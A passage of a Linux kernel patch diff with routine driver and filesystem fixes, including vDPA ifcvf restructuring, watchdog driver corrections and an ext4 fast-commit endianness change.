+ 	for (win = 0; win < dram->num_cs; win++) {
+-		const struct mbus_dram_window *cs = dram->cs + win;
++		const struct mbus_dram_window *cs = &dram->cs[win];
+ 
+ 		writel(((cs->size - 1) & 0xffff0000) | (cs->mbus_attr << 8) |
+ 		       (dram->mbus_dram_target_id << 4) | 1,
+diff --git a/drivers/usb/storage/ene_ub6250.c b/drivers/usb/storage/ene_ub6250.c
+index 6012603f3630e..97c66c0d91f4d 100644
+--- a/drivers/usb/storage/ene_ub6250.c
++++ b/drivers/usb/storage/ene_ub6250.c
+@@ -939,7 +939,7 @@ static int ms_lib_process_bootblock(struct us_data *us, u16 PhyBlock, u8 *PageDa
+ 	struct ms_lib_type_extdat ExtraData;
+ 	struct ene_ub6250_info *info = (struct ene_ub6250_info *) us->extra;
+ 
+-	PageBuffer = kmalloc(MS_BYTES_PER_PAGE, GFP_KERNEL);
++	PageBuffer = kzalloc(MS_BYTES_PER_PAGE * 2, GFP_KERNEL);
+ 	if (PageBuffer == NULL)
+ 		return (u32)-1;
+ 
+diff --git a/drivers/vdpa/ifcvf/ifcvf_base.c b/drivers/vdpa/ifcvf/ifcvf_base.c
+index 3e4486bfa0b71..3ec5ca3aefe1d 100644
+--- a/drivers/vdpa/ifcvf/ifcvf_base.c
++++ b/drivers/vdpa/ifcvf/ifcvf_base.c
+@@ -10,11 +10,6 @@
+ 
+ #include "ifcvf_base.h"
+ 
+-struct ifcvf_adapter *vf_to_adapter(struct ifcvf_hw *hw)
+-{
+-	return container_of(hw, struct ifcvf_adapter, vf);
+-}
+-
+ u16 ifcvf_set_vq_vector(struct ifcvf_hw *hw, u16 qid, int vector)
+ {
+ 	struct virtio_pci_common_cfg __iomem *cfg = hw->common_cfg;
+@@ -37,8 +32,6 @@ u16 ifcvf_set_config_vector(struct ifcvf_hw *hw, int vector)
+ static void __iomem *get_cap_addr(struct ifcvf_hw *hw,
+ 				  struct virtio_pci_cap *cap)
+ {
+-	struct ifcvf_adapter *ifcvf;
+-	struct pci_dev *pdev;
+ 	u32 length, offset;
+ 	u8 bar;
+ 
+@@ -46,17 +39,14 @@ static void __iomem *get_cap_addr(struct ifcvf_hw *hw,
+ 	offset = le32_to_cpu(cap->offset);
+ 	bar = cap->bar;
+ 
+-	ifcvf= vf_to_adapter(hw);
+-	pdev = ifcvf->pdev;
+-
+ 	if (bar >= IFCVF_PCI_MAX_RESOURCE) {
+-		IFCVF_DBG(pdev,
++		IFCVF_DBG(hw->pdev,
+ 			  "Invalid bar number %u to get capabilities\n", bar);
+ 		return NULL;
+ 	}
+ 
+-	if (offset + length > pci_resource_len(pdev, bar)) {
+-		IFCVF_DBG(pdev,
++	if (offset + length > pci_resource_len(hw->pdev, bar)) {
++		IFCVF_DBG(hw->pdev,
+ 			  "offset(%u) + len(%u) overflows bar%u's capability\n",
+ 			  offset, length, bar);
+ 		return NULL;
+@@ -92,6 +82,7 @@ int ifcvf_init_hw(struct ifcvf_hw *hw, struct pci_dev *pdev)
+ 		IFCVF_ERR(pdev, "Failed to read PCI capability list\n");
+ 		return -EIO;
+ 	}
++	hw->pdev = pdev;
+ 
+ 	while (pos) {
+ 		ret = ifcvf_read_config_range(pdev, (u32 *)&cap,
+@@ -220,10 +211,8 @@ u64 ifcvf_get_features(struct ifcvf_hw *hw)
+ 
+ int ifcvf_verify_min_features(struct ifcvf_hw *hw, u64 features)
+ {
+-	struct ifcvf_adapter *ifcvf = vf_to_adapter(hw);
+-
+ 	if (!(features & BIT_ULL(VIRTIO_F_ACCESS_PLATFORM)) && features) {
+-		IFCVF_ERR(ifcvf->pdev, "VIRTIO_F_ACCESS_PLATFORM is not negotiated\n");
++		IFCVF_ERR(hw->pdev, "VIRTIO_F_ACCESS_PLATFORM is not negotiated\n");
+ 		return -EINVAL;
+ 	}
+ 
+@@ -232,13 +221,11 @@ int ifcvf_verify_min_features(struct ifcvf_hw *hw, u64 features)
+ 
+ u32 ifcvf_get_config_size(struct ifcvf_hw *hw)
+ {
+-	struct ifcvf_adapter *adapter;
+ 	u32 net_config_size = sizeof(struct virtio_net_config);
+ 	u32 blk_config_size = sizeof(struct virtio_blk_config);
+ 	u32 cap_size = hw->cap_dev_config_size;
+ 	u32 config_size;
+ 
+-	adapter = vf_to_adapter(hw);
+ 	/* If the onboard device config space size is greater than
+ 	 * the size of struct virtio_net/blk_config, only the spec
+ 	 * implementing contents size is returned, this is very
+@@ -253,7 +240,7 @@ u32 ifcvf_get_config_size(struct ifcvf_hw *hw)
+ 		break;
+ 	default:
+ 		config_size = 0;
+-		IFCVF_ERR(adapter->pdev, "VIRTIO ID %u not supported\n", hw->dev_type);
++		IFCVF_ERR(hw->pdev, "VIRTIO ID %u not supported\n", hw->dev_type);
+ 	}
+ 
+ 	return config_size;
+@@ -301,14 +288,11 @@ static void ifcvf_set_features(struct ifcvf_hw *hw, u64 features)
+ 
+ static int ifcvf_config_features(struct ifcvf_hw *hw)
+ {
+-	struct ifcvf_adapter *ifcvf;
+-
+-	ifcvf = vf_to_adapter(hw);
+ 	ifcvf_set_features(hw, hw->req_features);
+ 	ifcvf_add_status(hw, VIRTIO_CONFIG_S_FEATURES_OK);
+ 
+ 	if (!(ifcvf_get_status(hw) & VIRTIO_CONFIG_S_FEATURES_OK)) {
+-		IFCVF_ERR(ifcvf->pdev, "Failed to set FEATURES_OK status\n");
++		IFCVF_ERR(hw->pdev, "Failed to set FEATURES_OK status\n");
+ 		return -EIO;
+ 	}
+ 
+diff --git a/drivers/vdpa/ifcvf/ifcvf_base.h b/drivers/vdpa/ifcvf/ifcvf_base.h
+index f5563f665cc62..25bd4e927b274 100644
+--- a/drivers/vdpa/ifcvf/ifcvf_base.h
++++ b/drivers/vdpa/ifcvf/ifcvf_base.h
+@@ -39,7 +39,7 @@
+ #define IFCVF_INFO(pdev, fmt, ...)	dev_info(&pdev->dev, fmt, ##__VA_ARGS__)
+ 
+ #define ifcvf_private_to_vf(adapter) \
+-	(&((struct ifcvf_adapter *)adapter)->vf)
++	(((struct ifcvf_adapter *)adapter)->vf)
+ 
+ /* all vqs and config interrupt has its own vector */
+ #define MSIX_VECTOR_PER_VQ_AND_CONFIG		1
+@@ -89,12 +89,13 @@ struct ifcvf_hw {
+ 	u16 nr_vring;
+ 	/* VIRTIO_PCI_CAP_DEVICE_CFG size */
+ 	u32 cap_dev_config_size;
++	struct pci_dev *pdev;
+ };
+ 
+ struct ifcvf_adapter {
+ 	struct vdpa_device vdpa;
+ 	struct pci_dev *pdev;
+-	struct ifcvf_hw vf;
++	struct ifcvf_hw *vf;
+ };
+ 
+ struct ifcvf_vring_lm_cfg {
+@@ -109,6 +110,7 @@ struct ifcvf_lm_cfg {
+ 
+ struct ifcvf_vdpa_mgmt_dev {
+ 	struct vdpa_mgmt_dev mdev;
++	struct ifcvf_hw vf;
+ 	struct ifcvf_adapter *adapter;
+ 	struct pci_dev *pdev;
+ };
+diff --git a/drivers/vdpa/ifcvf/ifcvf_main.c b/drivers/vdpa/ifcvf/ifcvf_main.c
+index 44b29289aa193..d5036f49f161a 100644
+--- a/drivers/vdpa/ifcvf/ifcvf_main.c
++++ b/drivers/vdpa/ifcvf/ifcvf_main.c
+@@ -69,10 +69,9 @@ static void ifcvf_free_irq_vectors(void *data)
+ 	pci_free_irq_vectors(data);
+ }
+ 
+-static void ifcvf_free_per_vq_irq(struct ifcvf_adapter *adapter)
++static void ifcvf_free_per_vq_irq(struct ifcvf_hw *vf)
+ {
+-	struct pci_dev *pdev = adapter->pdev;
+-	struct ifcvf_hw *vf = &adapter->vf;
++	struct pci_dev *pdev = vf->pdev;
+ 	int i;
+ 
+ 	for (i = 0; i < vf->nr_vring; i++) {
+@@ -83,10 +82,9 @@ static void ifcvf_free_per_vq_irq(struct ifcvf_adapter *adapter)
+ 	}
+ }
+ 
+-static void ifcvf_free_vqs_reused_irq(struct ifcvf_adapter *adapter)
++static void ifcvf_free_vqs_reused_irq(struct ifcvf_hw *vf)
+ {
+-	struct pci_dev *pdev = adapter->pdev;
+-	struct ifcvf_hw *vf = &adapter->vf;
++	struct pci_dev *pdev = vf->pdev;
+ 
+ 	if (vf->vqs_reused_irq != -EINVAL) {
+ 		devm_free_irq(&pdev->dev, vf->vqs_reused_irq, vf);
+@@ -95,20 +93,17 @@ static void ifcvf_free_vqs_reused_irq(struct ifcvf_adapter *adapter)
+ 
+ }
+ 
+-static void ifcvf_free_vq_irq(struct ifcvf_adapter *adapter)
++static void ifcvf_free_vq_irq(struct ifcvf_hw *vf)
+ {
+-	struct ifcvf_hw *vf = &adapter->vf;
+-
+ 	if (vf->msix_vector_status == MSIX_VECTOR_PER_VQ_AND_CONFIG)
+-		ifcvf_free_per_vq_irq(adapter);
++		ifcvf_free_per_vq_irq(vf);
+ 	else
+-		ifcvf_free_vqs_reused_irq(adapter);
++		ifcvf_free_vqs_reused_irq(vf);
+ }
+ 
+-static void ifcvf_free_config_irq(struct ifcvf_adapter *adapter)
++static void ifcvf_free_config_irq(struct ifcvf_hw *vf)
+ {
+-	struct pci_dev *pdev = adapter->pdev;
+-	struct ifcvf_hw *vf = &adapter->vf;
++	struct pci_dev *pdev = vf->pdev;
+ 
+ 	if (vf->config_irq == -EINVAL)
+ 		return;
+@@ -123,12 +118,12 @@ static void ifcvf_free_config_irq(struct ifcvf_adapter *adapter)
+ 	}
+ }
+ 
+-static void ifcvf_free_irq(struct ifcvf_adapter *adapter)
++static void ifcvf_free_irq(struct ifcvf_hw *vf)
+ {
+-	struct pci_dev *pdev = adapter->pdev;
++	struct pci_dev *pdev = vf->pdev;
+ 
+-	ifcvf_free_vq_irq(adapter);
+-	ifcvf_free_config_irq(adapter);
++	ifcvf_free_vq_irq(vf);
++	ifcvf_free_config_irq(vf);
+ 	ifcvf_free_irq_vectors(pdev);
+ }
+ 
+@@ -137,10 +132,9 @@ static void ifcvf_free_irq(struct ifcvf_adapter *adapter)
+  * It returns the number of allocated vectors, negative
+  * return value when fails.
+  */
+-static int ifcvf_alloc_vectors(struct ifcvf_adapter *adapter)
++static int ifcvf_alloc_vectors(struct ifcvf_hw *vf)
+ {
+-	struct pci_dev *pdev = adapter->pdev;
+-	struct ifcvf_hw *vf = &adapter->vf;
++	struct pci_dev *pdev = vf->pdev;
+ 	int max_intr, ret;
+ 
+ 	/* all queues and config interrupt  */
+@@ -160,10 +154,9 @@ static int ifcvf_alloc_vectors(struct ifcvf_adapter *adapter)
+ 	return ret;
+ }
+ 
+-static int ifcvf_request_per_vq_irq(struct ifcvf_adapter *adapter)
++static int ifcvf_request_per_vq_irq(struct ifcvf_hw *vf)
+ {
+-	struct pci_dev *pdev = adapter->pdev;
+-	struct ifcvf_hw *vf = &adapter->vf;
++	struct pci_dev *pdev = vf->pdev;
+ 	int i, vector, ret, irq;
+ 
+ 	vf->vqs_reused_irq = -EINVAL;
+@@ -190,15 +183,14 @@ static int ifcvf_request_per_vq_irq(struct ifcvf_adapter *adapter)
+ 
+ 	return 0;
+ err:
+-	ifcvf_free_irq(adapter);
++	ifcvf_free_irq(vf);
+ 
+ 	return -EFAULT;
+ }
+ 
+-static int ifcvf_request_vqs_reused_irq(struct ifcvf_adapter *adapter)
++static int ifcvf_request_vqs_reused_irq(struct ifcvf_hw *vf)
+ {
+-	struct pci_dev *pdev = adapter->pdev;
+-	struct ifcvf_hw *vf = &adapter->vf;
++	struct pci_dev *pdev = vf->pdev;
+ 	int i, vector, ret, irq;
+ 
+ 	vector = 0;
+@@ -224,15 +216,14 @@ static int ifcvf_request_vqs_reused_irq(struct ifcvf_adapter *adapter)
+ 
+ 	return 0;
+ err:
+-	ifcvf_free_irq(adapter);
++	ifcvf_free_irq(vf);
+ 
+ 	return -EFAULT;
+ }
+ 
+-static int ifcvf_request_dev_irq(struct ifcvf_adapter *adapter)
++static int ifcvf_request_dev_irq(struct ifcvf_hw *vf)
+ {
+-	struct pci_dev *pdev = adapter->pdev;
+-	struct ifcvf_hw *vf = &adapter->vf;
++	struct pci_dev *pdev = vf->pdev;
+ 	int i, vector, ret, irq;
+ 
+ 	vector = 0;
+@@ -265,29 +256,27 @@ static int ifcvf_request_dev_irq(struct ifcvf_adapter *adapter)
+ 
+ 	return 0;
+ err:
+-	ifcvf_free_irq(adapter);
++	ifcvf_free_irq(vf);
+ 
+ 	return -EFAULT;
+ 
+ }
+ 
+-static int ifcvf_request_vq_irq(struct ifcvf_adapter *adapter)
++static int ifcvf_request_vq_irq(struct ifcvf_hw *vf)
+ {
+-	struct ifcvf_hw *vf = &adapter->vf;
+ 	int ret;
+ 
+ 	if (vf->msix_vector_status == MSIX_VECTOR_PER_VQ_AND_CONFIG)
+-		ret = ifcvf_request_per_vq_irq(adapter);
++		ret = ifcvf_request_per_vq_irq(vf);
+ 	else
+-		ret = ifcvf_request_vqs_reused_irq(adapter);
++		ret = ifcvf_request_vqs_reused_irq(vf);
+ 
+ 	return ret;
+ }
+ 
+-static int ifcvf_request_config_irq(struct ifcvf_adapter *adapter)
++static int ifcvf_request_config_irq(struct ifcvf_hw *vf)
+ {
+-	struct pci_dev *pdev = adapter->pdev;
+-	struct ifcvf_hw *vf = &adapter->vf;
++	struct pci_dev *pdev = vf->pdev;
+ 	int config_vector, ret;
+ 
+ 	if (vf->msix_vector_status == MSIX_VECTOR_PER_VQ_AND_CONFIG)
+@@ -320,17 +309,16 @@ static int ifcvf_request_config_irq(struct ifcvf_adapter *adapter)
+ 
+ 	return 0;
+ err:
+-	ifcvf_free_irq(adapter);
++	ifcvf_free_irq(vf);
+ 
+ 	return -EFAULT;
+ }
+ 
+-static int ifcvf_request_irq(struct ifcvf_adapter *adapter)
++static int ifcvf_request_irq(struct ifcvf_hw *vf)
+ {
+-	struct ifcvf_hw *vf = &adapter->vf;
+ 	int nvectors, ret, max_intr;
+ 
+-	nvectors = ifcvf_alloc_vectors(adapter);
++	nvectors = ifcvf_alloc_vectors(vf);
+ 	if (nvectors <= 0)
+ 		return -EFAULT;
+ 
+@@ -341,16 +329,16 @@ static int ifcvf_request_irq(struct ifcvf_adapter *adapter)
+ 
+ 	if (nvectors == 1) {
+ 		vf->msix_vector_status = MSIX_VECTOR_DEV_SHARED;
+-		ret = ifcvf_request_dev_irq(adapter);
++		ret = ifcvf_request_dev_irq(vf);
+ 
+ 		return ret;
+ 	}
+ 
+-	ret = ifcvf_request_vq_irq(adapter);
++	ret = ifcvf_request_vq_irq(vf);
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = ifcvf_request_config_irq(adapter);
++	ret = ifcvf_request_config_irq(vf);
+ 
+ 	if (ret)
+ 		return ret;
+@@ -414,7 +402,7 @@ static struct ifcvf_hw *vdpa_to_vf(struct vdpa_device *vdpa_dev)
+ {
+ 	struct ifcvf_adapter *adapter = vdpa_to_adapter(vdpa_dev);
+ 
+-	return &adapter->vf;
++	return adapter->vf;
+ }
+ 
+ static u64 ifcvf_vdpa_get_device_features(struct vdpa_device *vdpa_dev)
+@@ -479,7 +467,7 @@ static void ifcvf_vdpa_set_status(struct vdpa_device *vdpa_dev, u8 status)
+ 
+ 	if ((status & VIRTIO_CONFIG_S_DRIVER_OK) &&
+ 	    !(status_old & VIRTIO_CONFIG_S_DRIVER_OK)) {
+-		ret = ifcvf_request_irq(adapter);
++		ret = ifcvf_request_irq(vf);
+ 		if (ret) {
+ 			status = ifcvf_get_status(vf);
+ 			status |= VIRTIO_CONFIG_S_FAILED;
+@@ -511,7 +499,7 @@ static int ifcvf_vdpa_reset(struct vdpa_device *vdpa_dev)
+ 
+ 	if (status_old & VIRTIO_CONFIG_S_DRIVER_OK) {
+ 		ifcvf_stop_datapath(adapter);
+-		ifcvf_free_irq(adapter);
++		ifcvf_free_irq(vf);
+ 	}
+ 
+ 	ifcvf_reset_vring(adapter);
+@@ -758,12 +746,20 @@ static int ifcvf_vdpa_dev_add(struct vdpa_mgmt_dev *mdev, const char *name,
+ 	int ret;
+ 
+ 	ifcvf_mgmt_dev = container_of(mdev, struct ifcvf_vdpa_mgmt_dev, mdev);
+-	if (!ifcvf_mgmt_dev->adapter)
+-		return -EOPNOTSUPP;
++	vf = &ifcvf_mgmt_dev->vf;
++	pdev = vf->pdev;
++	adapter = vdpa_alloc_device(struct ifcvf_adapter, vdpa,
++				    &pdev->dev, &ifc_vdpa_ops, 1, 1, NULL, false);
++	if (IS_ERR(adapter)) {
++		IFCVF_ERR(pdev, "Failed to allocate vDPA structure");
++		return PTR_ERR(adapter);
++	}
+ 
+-	adapter = ifcvf_mgmt_dev->adapter;
+-	vf = &adapter->vf;
+-	pdev = adapter->pdev;
++	ifcvf_mgmt_dev->adapter = adapter;
++	adapter->pdev = pdev;
++	adapter->vdpa.dma_dev = &pdev->dev;
++	adapter->vdpa.mdev = mdev;
++	adapter->vf = vf;
+ 	vdpa_dev = &adapter->vdpa;
+ 
+ 	if (name)
+@@ -781,7 +777,6 @@ static int ifcvf_vdpa_dev_add(struct vdpa_mgmt_dev *mdev, const char *name,
+ 	return 0;
+ }
+ 
+-
+ static void ifcvf_vdpa_dev_del(struct vdpa_mgmt_dev *mdev, struct vdpa_device *dev)
+ {
+ 	struct ifcvf_vdpa_mgmt_dev *ifcvf_mgmt_dev;
+@@ -800,7 +795,6 @@ static int ifcvf_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ {
+ 	struct ifcvf_vdpa_mgmt_dev *ifcvf_mgmt_dev;
+ 	struct device *dev = &pdev->dev;
+-	struct ifcvf_adapter *adapter;
+ 	struct ifcvf_hw *vf;
+ 	u32 dev_type;
+ 	int ret, i;
+@@ -831,20 +825,16 @@ static int ifcvf_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	}
+ 
+ 	pci_set_master(pdev);
+-
+-	adapter = vdpa_alloc_device(struct ifcvf_adapter, vdpa,
+-				    dev, &ifc_vdpa_ops, 1, 1, NULL, false);
+-	if (IS_ERR(adapter)) {
+-		IFCVF_ERR(pdev, "Failed to allocate vDPA structure");
+-		return PTR_ERR(adapter);
++	ifcvf_mgmt_dev = kzalloc(sizeof(struct ifcvf_vdpa_mgmt_dev), GFP_KERNEL);
++	if (!ifcvf_mgmt_dev) {
++		IFCVF_ERR(pdev, "Failed to alloc memory for the vDPA management device\n");
++		return -ENOMEM;
+ 	}
+ 
+-	vf = &adapter->vf;
++	vf = &ifcvf_mgmt_dev->vf;
+ 	vf->dev_type = get_dev_type(pdev);
+ 	vf->base = pcim_iomap_table(pdev);
+-
+-	adapter->pdev = pdev;
+-	adapter->vdpa.dma_dev = &pdev->dev;
++	vf->pdev = pdev;
+ 
+ 	ret = ifcvf_init_hw(vf, pdev);
+ 	if (ret) {
+@@ -858,16 +848,6 @@ static int ifcvf_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	vf->hw_features = ifcvf_get_hw_features(vf);
+ 	vf->config_size = ifcvf_get_config_size(vf);
+ 
+-	ifcvf_mgmt_dev = kzalloc(sizeof(struct ifcvf_vdpa_mgmt_dev), GFP_KERNEL);
+-	if (!ifcvf_mgmt_dev) {
+-		IFCVF_ERR(pdev, "Failed to alloc memory for the vDPA management device\n");
+-		return -ENOMEM;
+-	}
+-
+-	ifcvf_mgmt_dev->mdev.ops = &ifcvf_vdpa_mgmt_dev_ops;
+-	ifcvf_mgmt_dev->mdev.device = dev;
+-	ifcvf_mgmt_dev->adapter = adapter;
+-
+ 	dev_type = get_dev_type(pdev);
+ 	switch (dev_type) {
+ 	case VIRTIO_ID_NET:
+@@ -882,12 +862,11 @@ static int ifcvf_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 		goto err;
+ 	}
+ 
++	ifcvf_mgmt_dev->mdev.ops = &ifcvf_vdpa_mgmt_dev_ops;
++	ifcvf_mgmt_dev->mdev.device = dev;
+ 	ifcvf_mgmt_dev->mdev.max_supported_vqs = vf->nr_vring;
+ 	ifcvf_mgmt_dev->mdev.supported_features = vf->hw_features;
+ 
+-	adapter->vdpa.mdev = &ifcvf_mgmt_dev->mdev;
+-
+-
+ 	ret = vdpa_mgmtdev_register(&ifcvf_mgmt_dev->mdev);
+ 	if (ret) {
+ 		IFCVF_ERR(pdev,
+diff --git a/drivers/watchdog/at91sam9_wdt.c b/drivers/watchdog/at91sam9_wdt.c
+index 292b5a1ca8318..fed7be2464420 100644
+--- a/drivers/watchdog/at91sam9_wdt.c
++++ b/drivers/watchdog/at91sam9_wdt.c
+@@ -206,10 +206,9 @@ static int at91_wdt_init(struct platform_device *pdev, struct at91wdt *wdt)
+ 			 "min heartbeat and max heartbeat might be too close for the system to handle it correctly\n");
+ 
+ 	if ((tmp & AT91_WDT_WDFIEN) && wdt->irq) {
+-		err = request_irq(wdt->irq, wdt_interrupt,
+-				  IRQF_SHARED | IRQF_IRQPOLL |
+-				  IRQF_NO_SUSPEND,
+-				  pdev->name, wdt);
++		err = devm_request_irq(dev, wdt->irq, wdt_interrupt,
++				       IRQF_SHARED | IRQF_IRQPOLL | IRQF_NO_SUSPEND,
++				       pdev->name, wdt);
+ 		if (err)
+ 			return err;
+ 	}
+diff --git a/drivers/watchdog/pcwd_usb.c b/drivers/watchdog/pcwd_usb.c
+index 1bdaf17c1d38d..8202f0a6b0935 100644
+--- a/drivers/watchdog/pcwd_usb.c
++++ b/drivers/watchdog/pcwd_usb.c
+@@ -325,7 +325,8 @@ static int usb_pcwd_set_heartbeat(struct usb_pcwd_private *usb_pcwd, int t)
+ static int usb_pcwd_get_temperature(struct usb_pcwd_private *usb_pcwd,
+ 							int *temperature)
+ {
+-	unsigned char msb, lsb;
++	unsigned char msb = 0x00;
++	unsigned char lsb = 0x00;
+ 
+ 	usb_pcwd_send_command(usb_pcwd, CMD_READ_TEMP, &msb, &lsb);
+ 
+@@ -341,7 +342,8 @@ static int usb_pcwd_get_temperature(struct usb_pcwd_private *usb_pcwd,
+ static int usb_pcwd_get_timeleft(struct usb_pcwd_private *usb_pcwd,
+ 								int *time_left)
+ {
+-	unsigned char msb, lsb;
++	unsigned char msb = 0x00;
++	unsigned char lsb = 0x00;
+ 
+ 	/* Read the time that's left before rebooting */
+ 	/* Note: if the board is not yet armed then we will read 0xFFFF */
+diff --git a/drivers/watchdog/rzg2l_wdt.c b/drivers/watchdog/rzg2l_wdt.c
+index 974a4194a8fd6..d404953d0e0f4 100644
+--- a/drivers/watchdog/rzg2l_wdt.c
++++ b/drivers/watchdog/rzg2l_wdt.c
+@@ -8,6 +8,7 @@
+ #include <linux/clk.h>
+ #include <linux/delay.h>
+ #include <linux/io.h>
++#include <linux/iopoll.h>
+ #include <linux/kernel.h>
+ #include <linux/module.h>
+ #include <linux/of_device.h>
+@@ -35,6 +36,8 @@
+ 
+ #define F2CYCLE_NSEC(f)			(1000000000 / (f))
+ 
++#define RZV2M_A_NSEC			730
++
+ static bool nowayout = WATCHDOG_NOWAYOUT;
+ module_param(nowayout, bool, 0);
+ MODULE_PARM_DESC(nowayout, "Watchdog cannot be stopped once started (default="
+@@ -51,11 +54,35 @@ struct rzg2l_wdt_priv {
+ 	struct reset_control *rstc;
+ 	unsigned long osc_clk_rate;
+ 	unsigned long delay;
++	unsigned long minimum_assertion_period;
+ 	struct clk *pclk;
+ 	struct clk *osc_clk;
+ 	enum rz_wdt_type devtype;
+ };
+ 
++static int rzg2l_wdt_reset(struct rzg2l_wdt_priv *priv)
++{
++	int err, status;
++
++	if (priv->devtype == WDT_RZV2M) {
++		/* WDT needs TYPE-B reset control */
++		err = reset_control_assert(priv->rstc);
++		if (err)
++			return err;
++		ndelay(priv->minimum_assertion_period);
++		err = reset_control_deassert(priv->rstc);
++		if (err)
++			return err;
++		err = read_poll_timeout(reset_control_status, status,
++					status != 1, 0, 1000, false,
++					priv->rstc);
++	} else {
++		err = reset_control_reset(priv->rstc);
++	}
++
++	return err;
++}
++
+ static void rzg2l_wdt_wait_delay(struct rzg2l_wdt_priv *priv)
+ {
+ 	/* delay timer when change the setting register */
+@@ -115,25 +142,23 @@ static int rzg2l_wdt_stop(struct watchdog_device *wdev)
+ {
+ 	struct rzg2l_wdt_priv *priv = watchdog_get_drvdata(wdev);
+ 
++	rzg2l_wdt_reset(priv);
+ 	pm_runtime_put(wdev->parent);
+-	reset_control_reset(priv->rstc);
+ 
+ 	return 0;
+ }
+ 
+ static int rzg2l_wdt_set_timeout(struct watchdog_device *wdev, unsigned int timeout)
+ {
+-	struct rzg2l_wdt_priv *priv = watchdog_get_drvdata(wdev);
+-
+ 	wdev->timeout = timeout;
+ 
+ 	/*
+ 	 * If the watchdog is active, reset the module for updating the WDTSET
+-	 * register so that it is updated with new timeout values.
++	 * register by calling rzg2l_wdt_stop() (which internally calls reset_control_reset()
++	 * to reset the module) so that it is updated with new timeout values.
+ 	 */
+ 	if (watchdog_active(wdev)) {
+-		pm_runtime_put(wdev->parent);
+-		reset_control_reset(priv->rstc);
++		rzg2l_wdt_stop(wdev);
+ 		rzg2l_wdt_start(wdev);
+ 	}
+ 
+@@ -156,6 +181,7 @@ static int rzg2l_wdt_restart(struct watchdog_device *wdev,
+ 		rzg2l_wdt_write(priv, PEEN_FORCE, PEEN);
+ 	} else {
+ 		/* RZ/V2M doesn't have parity error registers */
++		rzg2l_wdt_reset(priv);
+ 
+ 		wdev->timeout = 0;
+ 
+@@ -253,6 +279,13 @@ static int rzg2l_wdt_probe(struct platform_device *pdev)
+ 
+ 	priv->devtype = (uintptr_t)of_device_get_match_data(dev);
+ 
++	if (priv->devtype == WDT_RZV2M) {
++		priv->minimum_assertion_period = RZV2M_A_NSEC +
++			3 * F2CYCLE_NSEC(pclk_rate) + 5 *
++			max(F2CYCLE_NSEC(priv->osc_clk_rate),
++			    F2CYCLE_NSEC(pclk_rate));
++	}
++
+ 	pm_runtime_enable(&pdev->dev);
+ 
+ 	priv->wdev.info = &rzg2l_wdt_ident;
+diff --git a/drivers/watchdog/sbsa_gwdt.c b/drivers/watchdog/sbsa_gwdt.c
+index 9791c74aebd48..63862803421f1 100644
+--- a/drivers/watchdog/sbsa_gwdt.c
++++ b/drivers/watchdog/sbsa_gwdt.c
+@@ -150,6 +150,7 @@ static int sbsa_gwdt_set_timeout(struct watchdog_device *wdd,
+ 	struct sbsa_gwdt *gwdt = watchdog_get_drvdata(wdd);
+ 
+ 	wdd->timeout = timeout;
++	timeout = clamp_t(unsigned int, timeout, 1, wdd->max_hw_heartbeat_ms / 1000);
+ 
+ 	if (action)
+ 		sbsa_gwdt_reg_write(gwdt->clk * timeout, gwdt);
+diff --git a/drivers/watchdog/watchdog_dev.c b/drivers/watchdog/watchdog_dev.c
+index 55574ed425042..fdffa6859dde3 100644
+--- a/drivers/watchdog/watchdog_dev.c
++++ b/drivers/watchdog/watchdog_dev.c
+@@ -1061,8 +1061,8 @@ static int watchdog_cdev_register(struct watchdog_device *wdd)
+ 		if (wdd->id == 0) {
+ 			misc_deregister(&watchdog_miscdev);
+ 			old_wd_data = NULL;
+-			put_device(&wd_data->dev);
+ 		}
++		put_device(&wd_data->dev);
+ 		return err;
+ 	}
+ 
+diff --git a/fs/ext4/ext4.h b/fs/ext4/ext4.h
+index 140e1eb300d17..6479146140d20 100644
+--- a/fs/ext4/ext4.h
++++ b/fs/ext4/ext4.h
+@@ -1529,6 +1529,7 @@ struct ext4_sb_info {
+ 	unsigned int s_mount_opt2;
+ 	unsigned long s_mount_flags;
+ 	unsigned int s_def_mount_opt;
++	unsigned int s_def_mount_opt2;
+ 	ext4_fsblk_t s_sb_block;
+ 	atomic64_t s_resv_clusters;
+ 	kuid_t s_resuid;
+diff --git a/fs/ext4/fast_commit.c b/fs/ext4/fast_commit.c
+index 4594b62f147bb..b06de728b3b6c 100644
+--- a/fs/ext4/fast_commit.c
++++ b/fs/ext4/fast_commit.c
+@@ -1332,8 +1332,14 @@ struct dentry_info_args {
+ 	char *dname;
+ };
+ 
++/* Same as struct ext4_fc_tl, but uses native endianness fields */
++struct ext4_fc_tl_mem {
++	u16 fc_tag;
++	u16 fc_len;
++};
++
+ static inline void tl_to_darg(struct dentry_info_args *darg,
+-			      struct ext4_fc_tl *tl, u8 *val)
++			      struct ext4_fc_tl_mem *tl, u8 *val)
+ {
+ 	struct ext4_fc_dentry_info fcd;
+ 
+@@ -1345,16 +1351,18 @@ static inline void tl_to_darg(struct dentry_info_args *darg,
+ 	darg->dname_len = tl->fc_len - sizeof(struct ext4_fc_dentry_info);
+ }
+ 
+-static inline void ext4_fc_get_tl(struct ext4_fc_tl *tl, u8 *val)
++static inline void ext4_fc_get_tl(struct ext4_fc_tl_mem *tl, u8 *val)
+ {
+-	memcpy(tl, val, EXT4_FC_TAG_BASE_LEN);
+-	tl->fc_len = le16_to_cpu(tl->fc_len);
+-	tl->fc_tag = le16_to_cpu(tl->fc_tag);
++	struct ext4_fc_tl tl_disk;
++
++	memcpy(&tl_disk, val, EXT4_FC_TAG_BASE_LEN);
++	tl->fc_len = le16_to_cpu(tl_disk.fc_len);
++	tl->fc_tag = le16_to_cpu(tl_disk.fc_tag);
+ }
+ 
+ /* Unlink replay function */
+-static int ext4_fc_replay_unlink(struct super_block *sb, struct ext4_fc_tl *tl,
+-				 u8 *val)
++static int ext4_fc_replay_unlink(struct super_block *sb,
++				 struct ext4_fc_tl_mem *tl, u8 *val)
+ {
+ 	struct inode *inode, *old_parent;
+ 	struct qstr entry;
+@@ -1451,8 +1459,8 @@ out:
+ }
+ 
+ /* Link replay function */
+-static int ext4_fc_replay_link(struct super_block *sb, struct ext4_fc_tl *tl,
+-			       u8 *val)
++static int ext4_fc_replay_link(struct super_block *sb,
++			       struct ext4_fc_tl_mem *tl, u8 *val)
+ {
+ 	struct inode *inode;
+ 	struct dentry_info_args darg;
